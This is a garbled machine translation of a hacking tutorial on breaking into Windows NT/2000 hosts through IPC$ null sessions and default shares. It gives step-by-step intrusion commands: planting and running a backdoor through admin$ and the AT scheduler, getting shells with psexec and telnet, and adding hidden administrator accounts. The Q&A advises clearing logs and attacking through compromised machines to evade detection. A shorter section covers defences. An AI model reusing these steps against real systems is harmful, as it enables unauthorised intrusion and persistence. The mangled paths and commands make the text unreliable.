Usually we can always hear someone who is saying IPC $ vulnerability, IPC $ vulnerability, in fact, IPC $ is not a true vulnerability, I think someone says this, must refer to Microsoft's own 'back door': empty A null session. So what is empty conversation?
A abstract, what is IPC $ 3 What is an empty session four empty session can do what five IPC $ UK used in the six IPC pipes in the HACK attack Six IPC $ Connection Failed Reason for the eight copy file failed reason Nine The AT command and XP limit 10 for IPC $ IPC $ IPC $ IPC $ IPC $, and other shared elevents, the commands that need shells can complete, twelve invaders, 13 comparison of past and today IPC $ invading 14 How to prevent IPC $ invading fifteen IPC $ Intrusion Q & A
A summary Note: The various situations discussed herein have occurred in the WIN NT / 2000 environment. Win98 will not be discussed.
II What is IPC $ IPC $ (Internet Process Connection) is a resource shared "named pipe", which is a named pipe that opens inter-process communication and open by providing trusted username and password, connecting both sides to establish a secure channel. And exchange of encrypted data in this channel, thereby implementing access to remote computers. IPC $ is a new feature of NT / 2000, which has a feature that only one connection is allowed between two IPs within the same time. NT / 2000 also opens the default sharing while providing IPC $ feature, all logical sharing (C $, D $, E $ ...) and system catalog Winnt or Windows (admin $) shared. All of these, Microsoft's original intention is to facilitate administrator management, but in interested in unintentional, there is a decrease in system security. Usually we can always hear someone who is saying IPC $ vulnerability, IPC $ vulnerability, in fact, IPC $ is not a true vulnerability, I think someone says this, must refer to Microsoft's own 'back door': empty A null session. So what is empty conversation?
Three What is an empty session before introducing an empty session, we need to understand how a security meeting is established. In Windows NT 4.0, the Challenge Response Agreement is used to establish a session with the remote machine. The establishment of a successful session will become a secure tunnel, establishing the two parties through it through it, the process of the process is as follows: 1) Session requestor (customer) Send a packet to the session receiver (server), requiring the establishment of the security tunnel; 2) The server generates a random 64-bit number (implementation challenge) transfer back to customers; 3) The customer gets the 64-bit number generated by the server The password that tries to establish a session, returns the result to the server (implement response); 4) After receiving the response, send to local security verification (LSA), LSA verifies the response by using the user's correct password to confirm the request Identity. If the requester's account is the local account of the server, verify local; if the requested account is a domain account, the response is transmitted to the domain controller to verify. When the response to the challenge is verified correctly, an access token is generated, and then transmitted to the customer. Customers use this access token to connect to resources on the server until the suggested session is terminated. The above is a rough process established by a security conference. What is the empty session?
The empty board is a session established with the server without trust (ie, the user name and password is not provided), but according to the Win2000 access control model, the establishment of the empty space will also provide a token, but the empty session is in the process of establishing There is no authentication of user information, so this token does not contain user information, so this session does not allow the system to send encrypted information, but this does not mean that there is no security identifier SID in the token of the empty session (it identifies User and locale), for an empty box, the SID of the token provided by the LSA is S-1-5-7, this is the SID of the empty session, the username is: Anonymous Logon (this username is available in the user list As seen in the SAM database, it is not found in the SAM database), this access token contains the following group: Everyone Network will be authorized to access the above two in the security policy limit. The group has the right to access all information. So what can I do if I build an empty session? What is the four empty session to do for NT, with the default security settings, with an empty connection, you can list the users and shares on the target host, access the sharing of Everyone privilege, access a small part of the registry, etc., there is no much utilization value; The 2000 role is smaller, because in Windows 2000 and later, only administrators and backup operators have the right to access the registry from the network, and it is not convenient to achieve tools. From these we can see that this kind of non-credit session does not use, but from a complete IPC $ invading, the empty space is an indispensable springboard because we can get a list of households from it, and large Most weak password scanning tools use this user list to make a password susceptibility, the successful export user list greatly increases the success rate of the suspension, only from this point, enough to explain the safety hazards caused by the empty session, so empty The session is not useless. The following is some specific commands that can be used in the empty session:
1 First, let's create an empty connection first (of course, this requires the target open IPC $) command: Net USE iPipc $ "" / user: "" Note: The above command includes four spaces, NET and USE have a space, Uses behind, the password is around one space.
2 View the shared resource command of the remote host: NET View IP explanation: After establishing an empty connection, use this command to view the shared resource of the remote host, if it opens, you can get the following result, but this command cannot be Display default sharing.
Shared resource resource sharing name type of *. *. *. *
-------------------------------------------------- --------- Netlogon Disk Logon Server Shareesysvol Disk Logon Server Share command successfully completed.
3 View the current time command of the remote host: NET Time IP Interpretation: Use this command to get a remote host's current time.
4 Get the NetBIOS user name list (need to open your own nbt) command: nbtstat -a ip can get a list of NetBIOS usernames for a remote host, return to the following results:
Node ipaddress: [*. *. *. *] Scope id: []
Netbios Remote Machine Name Table
Name Type Status -------------------------------------------- Server < 00> UNIQUE RegisteredOYAMANISHI-H <00> GROUP RegisteredOYAMANISHI-H <1C> GROUP registeredSERVER <20> UNIQUE RegisteredOYAMANISHI-H <1B> UNIQUE RegisteredOYAMANISHI-H <1E> GROUP registeredSERVER <03> UNIQUE RegisteredOYAMANISHI-H <1D> UNIQUE Registered. .__ msbrowse __. <01> Group registeredinet ~ services <1c> Group registeredis ~ server ...... <00> unique registered
Mac Address = 00-50-8B-9A-2D-37
The above is what we often use empty sessions, it seems to have a lot of things, but you should pay attention to it: Establish an IPC $ connection will leave a record in the Event log, whether you are successful. Ok, then let's take a look at the ports used by IPC $?
Five IPC $ The port usually understands some basic knowledge: 1 SMB: (Server Message Block) Windows protocol, for file printing sharing services; 2 NBT: (NetBIOS over TCP / IP) Use 137 (UDP) 138 (UDP) 139 (TCP) port implementation of NetBIOS network interconnection based on TCP / IP protocol. 3 SMB in WindowsNT is implemented based on the NBT implementation, even with the 139 (TCP) port; in Windows2000, SMB can be implemented directly through the 445 port in addition to the NBT implementation.
With these basic knowledge, we can further discuss access to the network sharing to the port:
For Win2000 client (initiation end): 1 If the client is allowed to connect to the server when the server is allowed, the client will try to access the 139 and 445 ports at the same time. If the 445 port has a response, then send the RST package to 139 port disconnected. Connection, use the 455 port to perform sessions when the 445 port does not respond to the 139 port, if the two ports do not respond, the session failed; 2 If the server is connected to the server, then the client will try Visit 445 port, if the 445 port is not responding, then the session fails.
For Win2000 server side: 1 If NBT is allowed, the UDP port 137, 138, TCP port 139, 445 will open (2 If NBT is prohibited, only 445 port is open.
Our established IPC $ session is equally complied with the above principles. Obviously, if the remote server does not listen to 139 or 445 port, IPC $ session cannot be created.
Six IPC Pipes The meaning IPC pipeline in the HACK attack is Microsoft designed to facilitate administrators to make remote management, but in the invasive perspective, the host of open IPC pipes seems to be easier to succeed. With IPC pipeline, we can call some system functions remotely (mostly through tools, but requires appropriate permissions), which is often the key to the success or failure of intrusion. If you don't consider these, only from the aspect of the transfer file, the IPC pipeline has given the invader's great support, and even has become the most important transmission means, so you can always see some friends in the major forums. The IPC pipeline of the target machine is turned to fight for life. Of course, we cannot neglect an important role in the IPC pipeline. If you want you to taste the embarrassment of the overhead session, there is no permission, and we will not help. But once the invader has obtained the administrator's permissions, the IPC pipeline will show the double-edged sword. Some common causes of seven IPC $ Connection Failure The following is some of common causes of IPC $ connection failure:
1 IPC connection is a unique feature in Windows NT and above, because it needs to use a lot of DLL functions in Windows NT, so you can't run in the Windows 9.x / ME system, that is, only NT / 2000 / XP can Establish an IPC $ connected to each other, 98 / ME cannot establish an IPC $ connection;
2 If you want to create an IPC $ connection, you need to enable the responder to turn on IPC $ sharing, even if the empty connection is true, if the response party turns off the IPC $, will not be established;
3 Connecting the initiator does not start the LanmanWorkStation service (display name: workstation): It provides network links and communication, without its initiator unable to initiate a connection request;
4 Response party does not start the LanmanServer service (display name: server): It provides RPC support, file, print, and named pipe sharing, IPC $ relies on this service, without its host will not be able to respond to the initiator's connection request, but no It still initiates IPC $ connection;
5 Response party does not start Netlogon, it supports logging in to the computer PASS-THROUGH account (not much this situation);
6 Responsive 139,445 ports are not in a listening state or blocked by firewall;
7 Connection initiator has not opened 139,445 port;
8 username or password error: If this error occurs, the system will give you an error prompt to the 'unrecognized password' (obvious empty session excludes such an error);
9 Command Enter an error: Map may be more or less, when the user name and password do not contain spaces, the double quotes can be omitted, if the password is empty, you can enter two quotes directly ""
10 If the other party restarts the computer in the case where the connection has been established, the IPC $ connection will be automatically disconnected and the connection is required.
In addition, you can also analyze the reason according to the returned error number:
Error number 5, refusal to access: User users are not administrator privileges; error numbers 51, Windows can't find network path: network has problems; error number 53, no network path: IP address error; goal is not booting The target LanmanServer service is not started; the target has a firewall (port filtering); error number 67, not finding the network name: Your LanmanWorkStation service is not started or deleted IPC $; error number 1219, provided credentials and existing credentials Set conflict: You have already established an IPC $ with the other party, please delete the re-connect; error number 1326, unknown user name or error password: The reason is obvious; error number 1792, try to log in, but the network login service is not started: Target The Netlogon service is not started; the error number 2242, this user's password has expired: the target has an account policy, enforces the regular requirements to change the password. The reason for the failure of the eight copy file Some friends have successfully established IPC $ connected, but when Copy has encountered such trouble, it cannot be copied, then what is the common cause of replication failure?
1 The other party does not open the shared folder This error occurs, accounting for more than 50%. Many friends do not know if the other party has a shared folder after IPC $ connection, and the result is that the copy fails and depressed. So I suggested that you must use the NET View IP command before making a copy, you want to copy the shared folder existing (using the software to see is of course better), don't think it is necessary to build an IPC $ connection, you must have a shared folder existence .
2 To the default sharing copy fails, this type of error is also often crossed, mainly two small aspects:
1) Error thinking to establish an IPC $ connected to the host will always open the default share, so you will immediately share the copy file to the C $, D $, and Admin $, and once the other party does not turn on the default sharing. Will lead to the failed copy. IPC $ successfully only explains the other party to open IPC $ sharing, and does not explain that the default share must exist. IPC $ sharing and default sharing are two yards, IPC $ sharing is a named pipe, not which actual folder, and the default sharing is a real shared folder;
2) Since the NET View IP This command cannot display the default shared folder (because the default shared belt $), we cannot judge whether the other party opens the default share, so if the other party does not turn on the default sharing, then all directions The operations of sharing cannot be successful; (but most of the scanning software can sweep the default shared directory while sweeping the password, avoiding such errors)
Important: Please distinguish between IPC sharing, default sharing, normal sharing these three differences: IPC sharing is a pipe, not a practical shared folder; default sharing is a folder opened by default when installing; ordinary sharing is our own Open a shared folder that can set permissions.
3 User privileges are not enough, including four cases: 1) When copying to all shares (default sharing and normal sharing), permission is not enough; 2) When copying to the default, in Win2000 Pro version, only Administrators and Backup Operators group members can also be accessed to these shared directories in the Win2000 Server version Server OperatROS group; 3) When copying to normal sharing, there must be corresponding permissions (ie, the other party administrator's prior set access); 4) each other can By the firewall or security software, external access sharing is prohibited; The shared folder, because the administrator can access the ordinary shared folder, as shown in Figure 6, the administrator settings for D disk settings are only fully accessible to the folder only named xinxin, then At this time, even if you have administrator privileges, you still can't access the D disk. But what interest is, if the other party opens the default sharing of D $, then you can visit D $, which will bypass the permissions limit, interested friends can test themselves.
4 There is also a case where the firewall is killed or in the LAN, that is, maybe your replication operation has been successful, but when the remote is running, the firewall is killed, causing the file; or you copy Trojan to the local area network The host causes the connection failure (this is not in this case without this). If you don't think of this, you will think that it is a problem, but the actual copy operation has succeeded, just running out.
Oh, everyone knows that IPC $ connects a variety of problems during the actual operation, just some common mistakes, I haven't said, everyone can give me a wake up.
Nine About AT Commands and XP The restrictions on IPC $ originally want to say the reason for the failure of the AT remote running program, but considering that the success rate of AT is not very high, there are a lot of problems, and there is no mention here (mention it) The more people used, the more people use it), but recommend everyone to run the program with a PSExec.exe, assume that you want the remote machine to perform local C: xinxin.exe file, and the administrator is administrator, the password is 1234, then enter the following Command: psexec ip -u administrator -p 1234 -cc: xinxin.exe If the IPC connection has been established, the two parameters of -U -P do not need, PSExec.exe will automatically copy files to the remote machine and run.
The IPC $ IPC $ in XP does not want to discuss here, I want to take it out alone, but I saw that more and more friends are very urgent, most of the operations are difficult to succeed. I will simply mention it here. In the default security option of XP, any remote access is only given to the guest limit, that is, even if you are using the administrator account and password, the permissions you get are only Guest, so big Some operations will fail because of insufficient permissions, and there is no good way to break through this limit so far. So if you really got XP administrator password, I suggest you avoid IPC pipelines.
Ten how to open the target IPC $ sharing and other shared target IPC $ not easy to open, otherwise it will be disrupted in the world. You need a shell of admin privilege, such as Telnet, Trojan, CMD, then execute under the shell: NET Share IPC $ Open Target IPC $ sharing; NET Share IPC $ / DEL Turn the target IPC $ sharing; if you To open a shared folder, you can use: Net Share xinxin = C: This will open its C on the shared folder with the XINXIN shared folder. (But I found that many people mistakenly think that the command to open the shared folder is NET Share C $, which is also a big model to give the vegetable bird, it is really misunderstood. A declaration again, these operations can be implemented under the shell. Eleventh Some commands that need shell can do to see that many tutorials are very incorrect in this area, and some need shells can complete the command, which is actuated under the IPC $ connection, and play a misleading. Then I summarize the command that needs to be completed at the shell:
1 Establish a user to the remote host, activate the user, modify the user password, and add the operation of the management group to complete it under the shell;
2 Turn on the IPC $ sharing of the remote host, the default share, the ordinary shared operation needs to be completed under the shell;
3 Run / Close the service of the remote host, you need to do it under the shell;
4 Start / kill the processes of the remote host, but also need to be completed under the shell (except for software, such as pskill).
The command that may be used in the invasion is for the integrity of this tutorial, I list some common commands in the IPC $ invading, if you have already mastered these commands, you can skip this part to see the content below. Note that these commands apply to the local or remote, if only applications are available, you can only perform it to the remote host after you get the Shell of the remote host (such as CMD, Telnet, etc.).
1 Create / delete the command to connect IPC $
1) Establish an empty connection: NET USE 127.0.0.1IPC $ "" / user: ""
2) Establish a non-empty connection: NET Use 127.0.0.1IPC $ "Password" / user: "User Name"
3) Delete connection: NET use 127.0.0.1Ipc $ / DEL
2 Operation commands for remote hosts in IPC $
1) View the shared resources of the remote host (no default sharing): Net View 127.0.0.1
2) View the current time of the remote host: NET TIME 127.0.0.1
3) Get a list of NetBIOS usernames from the remote host: nbtstat -a 127.0.0.1
4) Mapping / Remove Remote Sharing: NET Use Z: 127.0.0.1c This command will share a shared resource named C.
NET USE Z: / DEL Deletes the mapped Z disk, other disk classes push
5) Copy the file to the remote host: COPY path file name IP shared directory name, such as: Copy C: xinxin.exe 127.0.0.1c $ is about XINXIN.EXE under the C disk to the other party C drive, you can also The files on the remote host are copied to their own machine: Copy 127.0.0.1c $ xinxin.exe C:
6) Remote Add Plan Task: AT IP Time Program Name, like: AT 127.0.0.0 11:00 xinxin.exe Note: Time to use 24-hour system; if you plan to run the program in the system default search path (such as system32 /) Do not use the path, otherwise you must add the path 3 local command.
1) View the shared resources of the local host (you can see the local default sharing) NET Share
2) Get a list of users from local hosts Net User
3) Display the account information of a user's account information NET USER account name
4) Display the current service of the local host NET START
5) Start / turn off the local service NET Start Service Name NET STOP Service Name
6) Add account NET USER account name password / add
7) Activate the Disabled User NET UESR Account Name / Active: YES
8) Join the administrator group NET localgroup administrators account name / add
Obviously, although these are local commands, if you enter the shell of the remote host, if you have successfully entered these commands after your Telnet, then these local inputs will work on the remote host.
4 Others Command 1) Telnet Telnet IP Port Telnet 127.0.0.0 23
2) Telnetopentelnet.exe IP administrator account password NTLM with opentelnet.exe PORTOPENTELNET.EXE 127.0.0.1 Administrator "" 1 90 However, this gadget needs to meet four requirements: 1) Target Open IPC $ Sharing 2) You have to have administrator password and account 3) Target to turn on RemoteRegistry service, users can change NTLM certification 4) Valid only Win2K / XP
3) Get the shell with Psexec.exe, you need IPC pipes to support psexec.exe ip -u administrator account -P password cmdpsexec.exe 127.0.0.1 -u administrator -p "" cmd
Thirteen comparison of the past and today IPC $ invasion is compared, then I will first write the past IPC $ intrusion step to everyone, it is a quite classic step:
[1] C:> NET USE 127.0.0.1IPC $ "" / user: Admintitrators establishes the connection with the open air interface
[2] C:> Net View 127.0.0.1 View remote shared resources
[3] C:> C:> Copy SRV.EXE 127.0.0.1Admin $ system32 Copy the disposable back door srv.exe under the system folder of the other party, the premise is Admin $ to open
[4] C:> NET TIME 127.0.0.1 View the current time of the remote host
[5] c:> AT 127.0.0.1 Time Srv.exe Run Srv.exe remotely with the AT command, you need the other party to open the 'Task Scheduler' service
[6] C:> NET TIME 127.0.0.1 Views the current time again to estimate whether SRV.exe has been running, this step can be omitted
[7] C:> Telnet 127.0.0.1 99 Open a new window, log in to 127.0.0.1 with Telnet to get a shell (don't understand shell means? Then you will imagine the control of the remote machine. , Operation like DOS), 99 port is the port of Srv.exe opened the port of the disposable back door
[8] C: WinntSystem32> Net Start Telnet We launched a Telnet service in the Shell just landed on the shell. After all, Srv.exe is a one-time back door. We need a long-lasting back door for future access, if the other party's Telnet has already Start, this step can be omitted [9] c:> Copy NTLM.EXE 127.0.0.1Admin $ system32 In the original window, NTLM.exe is used to change Telnet authentication.
[10] C: WinntSystem32> NTLM.EXE Run NTLM.exe in the shell window, you can smoothly unharmably telnet this host [11] C:> Telnet 127.0.0.1 23 Telnet to 127.0 in a new window. 0.1, port 23 can be omitted so that we have a long-term back door
[12] C: WinntSystem32> NET User Account Name Password / AddC: WinntSystem32> NET UESR GUEST / ACTIVE: YESC: WINNTSYSTEM32> NET localGroup Administrators Account Name / Addelnet, you can build a new account, activate guest, join any account Administrator group, etc.
Ok, I'm writing here. I seem to go back to 2 or 3 years ago. At that time IPC $ everyone used, but with the emergence of new tools, some of the tools and orders mentioned above are now not usually used. Then let's take a look at the current efficient and simple IPC $ invading.
[1] psexec.exe ip -u administrator account -P password CMD With this tool we can get the shell in place
Opentelnet.exe Server Administrator account password NTLM authentication method Port With it to make it easy to change Telnet's verification mode and port, so that we will land
[2] There is no second step, after getting a shell, you can do anything, you can use Winshell with Winshell, clone, open the end of 3389.vbe, record the password with Win2kpass, in short, good There are a lot of tools, I chose, I will not say much.
14 How to prevent IPC $ Intrusion to see local shared resource run -CMD- Enter Net Share Delete Sharing (One Enter One) NET Share IPC $ / DeleTeNet Share Admin $ / DeleteNet Share C $ / DeleTeNet Share D $ / Delete (if there e, f, ... can continue to delete)
1 Prohibit empty connection to enumerate (this operation does not block the establishment of empty connections)
Running regedit, find the following primary key [HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETCONTROLLSA] change the key value of Restrictanonymous = DWORD: 1 If set to "1", an anonymous user can still connect to IPC $ sharing, but you can't pass this connection to list SAM account and share The permissions of information; "2" is added in Windows 2000, and the user who does not acquire anonymity will not be able to connect IPC. It is recommended to be 1. If the primary key mentioned above does not exist, create a new key value. If you feel that you can change your registry, you can set this item in your local security settings: Local Security Settings - Local Policy - Security Options - 'Additional Limits for Anonymous Connections'
2 prohibit default sharing
1) Look at the local shared resource run - CMD- Enter Net Share
2) Delete sharing (after restarting the default sharing still exists) NET Share IPC $ / deleteNet Share Admin $ / deleteNet Share C $ / DeleTeNet Share D $ / Delete (if there is e, f, ... can continue to delete) 3) Stop Server Service Net Stop Server / Y (Re-enable after restarting)
4) Prohibiting automatic open default sharing (this action does not turn off IPC $ sharing) Run -Regedit
Server version: Find the following primary key [HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETSERVICESLANSERVERVERVERVERVERVERVESLANSERVERVERVERVERVERETERS] to change the key value of AutoShareserver (DWORD) to: 00000000.
Pro version: Find the following primary key [HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETSERVICESLANSERVERVERVERVERVERVERVICESLANSERVERVERVERPARETERS] to change the key value of AutoShaRewks (DWORD) to: 00000000. These two key values do not exist in the host by default, they need to be manually added, and the machine will return the machine to take effect.
3 Turn off the IPC $ and the default sharing reliance: Server service If you really want to close the IPC $ sharing, then the Server service is prohibited: Control Panel - Administrative Tool - Services - Find the Server Service (right-click) - Properties - General - General - General - Start type - select is disabled, there may be prompts: XXX services will also turn off Whether you continue because there are some second-hand services to rely on Server service, don't take it.
4 Shield 139,445 Port Since there is no support for the above two ports, it is impossible to establish IPC $, so the shield 139, 445 port can also prevent IPC $ invading.
1) 139 port can be shielded locally by disabling NBT - TCP / IT attribute - Advanced -Wins- Select 'Disable NetBIOS' on TCP / IT
2) 445 port can modify the registry to add a shield key Hive: HKEY_LOCAL_MACHINEKey: SystemControlsetServicesNetBTParametersName: SMBDeviceEnabled Type: REG_DWORDValue: 0 after the restart the machine Modify Note: If you block out more than two ports, you can not use ipc $ invasion other people.
3) Install the firewall for port filtering
6 Set complex password to prevent passwords through IPC $ exhaust, I think this is the best way, enhance security awareness, more security than non-stopping.
Fifteen IPC $ Intrusion Q & A Feature 1. When IPC $ Intrusion, a record will be left in the server. Is there any way not to let the server find it?
A: Leave a record is sure, you can use the clear log program to delete, or invade with broilers.
2. You look at the situation below, but you can connect but you can't copy net use ***. ***. ***. *** IPC $ "Password" / user: "User Name" command success Copy ICMD.EXE ***. ***. ***. *** admin Can't find the network path command is unsuccessful
A: It's like "I can't find the network path", "I can't find the network name", most because you want to copy the shared folder that you don't open, so there will be an error when copying, you can try Look for other shared folders.
3. If the other party has opened IPC $, and can establish an air joint, but when the C, D disk is opened, you will ask the password, I know that there is not much permission, but nothing else? A: It is recommended to try a password with a stream or other scanning software. If you can't guess, you can only give up, after all, the ability to get a limited capacity.
4. I have already guess the administrator's password, and I have already been successful, but the net view ip found that it did not open the default sharing, what should I do?
A: First, correct your error, use NET View IP can't see the default sharing, you can try to copy the file to C $, D $ see, if you can't, explain that he closed the default sharing, then you Use opentelnet.exe or psexec.exe, usage.
5. After the connection is successful, I use the following command to establish an account, but I found this account on my own machine. What is going on? NET USET CCBIRDS / ADD
A: IPC $ establishment can only show that you have established a communication tunnel with the remote host, and it doesn't mean that you have a shell. Only after getting a shell, you can build an account in the remote machine, otherwise yours The operation is only done locally.
6. I have entered a meat machine, the administrator account, can be used to see his system time, but the copy program is not on his machine, each time it prompts "refusal to access, copy 0 files", Is it that the other party has any service? What should I do?
A: Generally, "Deny Access" is the result of insufficient permissions. It may be a problem with the account you use, and there is a possibility. If you want to copy the file to the ordinary shared folder, return this error, indicating this folder settings Allow you to access you (even if you are an administrator), this is analyzed in the previous article.
7. Can I use Win98 to establish IPC $ connected to the other party?
A: Theoretically cannot, to perform IPC $ operation, it is recommended to use Win2000, use other operating systems to bring a lot of unnecessary trouble.
8. I used Net USE iPipc $ "/ user" successfully established an empty space, but it is not possible to export the user list with nbtstat -a ip. Why?
A: The empty boxing can export the user list by default, but if the administrator disables the export list by modifying the registry, there will be what you said; it may be that your own NBT is not open, netstat The command is based on NBT.
9. When I establish IPC $, I return to the following information: 'Provision of credentials conflict with existing credentials', what is going on?
A: Oh, this shows that you have established an IPC $ connected to the target host, and two IPC $ connect to both hosts are not allowed.
10. I appear when mapping: f:> Net Use H: 211.161.134. * E $ system 85 error. The local device name is already in use. How is this going?
A: You are too careless, this shows that you have a H disk, mapped to the disk!
11. I have established a connection F:> Net use *. *. *. * IPC $ "123" / user: "guest" success, but when I mapping, I have a password, what is going on? ? F:> Net Use h: *. *. *. * C $ password in *. *. *. * C $ invalid. Please type *. *. *. * C $ 5: 5 errors occurred. access denied. A: Oh, huh, you want a password to indicate that your current user permissions are not enough, can't map C $ this default share, find way to improve permission or find the administrator's weak mouth! The default sharing is generally required for administrator privileges.
12. I swept it with SuperScan to a host opened 139 port, but why can't I get it?
A: You confuse the relationship between IPC $ with 139, the host that can connect to the IPC $ connected must open 139 or 445, but the host that opens the two ports may not be empty, because the other party can turn off the IPC $ sharing.
13. Most of my gates are all XP. I use a stream scan to several Administrator account passwords to be empty, and can be connected, but they can't copy things, saying errors 5. Why?
A: XP is high, and in the default setting of the security policy, when authentication of the local account, the default is a guest authority, even if you log in remotely with the administrator, there is only guest rights, so You copy the file, of course, is wrong 5: The permissions are not enough.
14. I use Net Use 192.168.0.2IPC $ "password" / user: "administrator" successfully, but NET Use I: 192.168.0.2c Please type 192.168.0.2 password, what is going on? Can I use an administrator? What should I access?
A: Although you have administrator privileges, administrators set up the C disk share permissions (Note: Normal sharing can set access, and the default sharing can not be set) may not be set to allow administrator access, so the above problem occurs.
15. If your own machine is prohibited from IPC $, can I connect to the machine to connect with IPC $? If Server service is prohibited?
A: It is forbidden to initiate IPC $ to connect, but this problem will be better.
16. Can you tell me the reason why the following two errors? C:> NET TIME 61.225. *. * The system has a 5 error. access denied.
"NET View 61.225. *. * The system has 5 errors. access denied.
A: I am also very wonderful when I encountered this problem. The error 5 indicates that the permissions are not enough, but the permissions of the empty session can complete the above two orders. Why can't he do it? Is it that he did not establish a connection? Later, the careless comrades told me that this is true that he forgot that he has already deleted IPC $, and he entered the two commands on it, and there was an error 5.
17. Do you see what is going on? F:> NET TIME does not find the time server. Type Net Helpmsg 3912 to get more help.
A: The answer is simple, your command is wrong, it should be that Net Time IP does not enter the IP address, of course, the server cannot be found. vi
